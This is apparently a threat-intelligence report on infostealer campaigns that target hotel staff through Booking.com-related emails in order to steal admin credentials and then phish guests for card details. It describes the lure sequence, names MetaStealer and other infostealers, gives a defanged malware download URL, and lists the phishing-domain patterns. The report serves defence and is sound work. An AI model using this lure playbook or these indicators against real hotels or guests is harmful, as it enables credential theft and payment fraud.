In the second half of 2023, the hospitality industry was increasingly targeted by spam and social-engineering campaigns that led to malicious software. The victims of these campaigns are threefold: customers who use the platforms for bookings, property operators who use the booking platforms and the booking platforms themselves. These campaigns have been tailored to take advantage of the type of frequent interactions that hotels have with guests, such as the sending of identity documents. Unfortunately, these interactions are prime opportunities for the classic bait-and-switch by threat actors, who substitute malware for the expected content.
These campaigns predominantly revolve around the Booking.com platform. The platform allows hotels and other property owners to list their properties. Property operators get their own administrative booking panel (accessed through admin.booking.com) to manage bookings. Cybercriminals seek access to these panels, as illicit access means opportunities to profit from fraud. We’ve seen rising demand for credentials for admin.booking.com. We track the trade in stolen login credentials across the underground and threat actors in our Credential Intelligence module, which collects datasets from information stealers (infostealers), instant messaging services, data breaches and more. In the last three months, we collected nearly 4,300 credential sets for admin.booking.com, which shows that there is a pervasive risk of account takeovers (ATOs).
Fraudsters can get access to the booking portals by tricking property owners into downloading infostealer malware. Hotel staff and guests often message each other back and forth with documents, and threat actors have taken advantage of this by sending malware to hotel staff. The infostealer malware collects the login credentials used by hotel staff and sends them back to the fraudsters. Once inside these booking panels, fraudsters then have access to the bookings stored within the platform. Then, those customers are targeted, with the fraudsters contacting upcoming guests and asking for payment. These messages are sent from the real platform, adding a veneer of legitimacy that makes it more likely the victims will be fooled. However, we also observed a few instances where hotels were directly targeted, following a similar approach. In this report, we examine these malware campaigns targeting the hotel industry.
[Image: Fig1]
To start the process of gaining unauthorized access to a hotel’s administration portal, threat actors make a reservation. After receiving a booking confirmation, they craft a response to the automatic confirmation message in order to start a dialog with the hotel staff. When the hotel responds, attackers proceed with a carefully crafted follow-up email that’s aimed at getting the staff member to follow a link. The link usually leads to a password-protected archive that contains documents that apparently validate the actor's previous requests, such as copies of passports or medical records that specify dietary requirements. Once the archive is downloaded and a password supplied by the fraudster is entered, the file is executed on the victim’s endpoint, triggering the deployment of infostealer malware. The infostealer starts collecting sensitive data, including administrative credentials for admin.booking.com.
Over the course of several months, we observed the use of various infostealers in campaigns, including StealC, Lumma, AgentTesla, Arkei, Vidar and MetaStealer, which is an improved RedLine variant. To provide the most current and relevant information, we will give an example of a campaign involving MetaStealer.
Since the beginning of December 2023, there has been a noticeable increase in the deployment of MetaStealer. Here we examine a campaign from Jan. 6, 2024. The diagram below shows the general attack flow for these types of campaigns.
[Image: Fig2 - This image shows two examples of attack flows that start with emails sent to hotel staff that eventually lead to infostealer infections.]
In these scenarios, a threat actor assumed the role of a prospective hotel guest and contacted the hotel to make a reservation (see below). This approach marked a slight shift from the usual strategy of responding to Booking.com confirmation emails. Instead, the actor directly engaged with hotels via their official email channels.
[Image: Fig3 - This image shows a screenshot of email correspondence between the threat actor and the administrator of the hotel. (Source: @JAMESWT_MHT X account on Jan. 6, 2024.)]
In this campaign, once a response was received from the hotel administrator, the threat actor sent a follow-up email outlining their room preferences and dates and included a URL disguised as a portable document format (PDF) file (see screenshot below). When the recipient clicked on the file, they were redirected to the FileTransfer data-sharing platform. This platform hosted a file named “ID and Card for booking.pdf.url.download.” Once this file was clicked, the “file.exe” file would be downloaded from a web page hosted at hxxp://89[dot]23.99.252/pdf/file.exe. Executing this file then would trigger the installation of MetaStealer.
[Image: Fig4 - This image shows a screenshot of email correspondence between the threat actor and the administrator of the hotel. (Source: @JAMESWT_MHT X account on Jan. 6, 2024)]
[Image: Fig5 - This image shows the FileTransfer data-sharing portal hosting the “ID and Card for booking.pdf.url.download.” (Source: @JAMESWT_MHT X account on Jan. 6, 2024)]
Once the threat actors gain access to the credential logs from the targeted victim's system, they obtain the capability to log in to the hotel's reservation portal, such as the admin.booking.com website. This access provides them with visibility into all current room or holiday reservations made by customers.
The threat actors then progress to the next phase of their scheme, which involves contacting these customers. They use email or the official app to pose as legitimate hotel administrators and request a fraudulent confirmation of payment details for upcoming stays.
[Image: Fig6 - This image shows an example of a phishing message enticing a victim to enter their credit card details.]
These messages contain a link that leads victims to a phishing page that mirrors the Booking.com interface. This page is pre-filled with the victim’s exact personal details, including their full name, stay duration and hotel information. The URL, designed to further deceive, follows the “booking.id(numbers).com,” “booking.reserve-visit.com” or “booking.confirmat-id(number).com” pattern. Threat actors then can exploit the information entered on these phishing pages.
Amid the complex cyber threats facing the hospitality industry, especially those involving platforms such as Booking.com, it is imperative for both industry professionals and customers to implement strong security practices. Here are some key recommendations for hospitality sector professionals and customers using services such as the Booking.com platform.
For hospitality sector professionals:
For customers using services such as Booking.com:
Pro-Russian hacktivism campaigns continued to be directed at countries and entities supporting Ukraine. Here's a briefing about new hacktivist groups and the risks the groups pose.
NATO's annual summit comes as member countries face a rapidly changing global security dynamic, with cyber playing a significant role.
Underground call center services are aiding threat actors in delivering malware through callback phishing and negotiating ransoms. Here's a briefing about different attack scenarios and tips for defense.
Stay informed with our weekly executive update, sending you the latest news and timely data on the threats, risks, and regulations affecting your organization.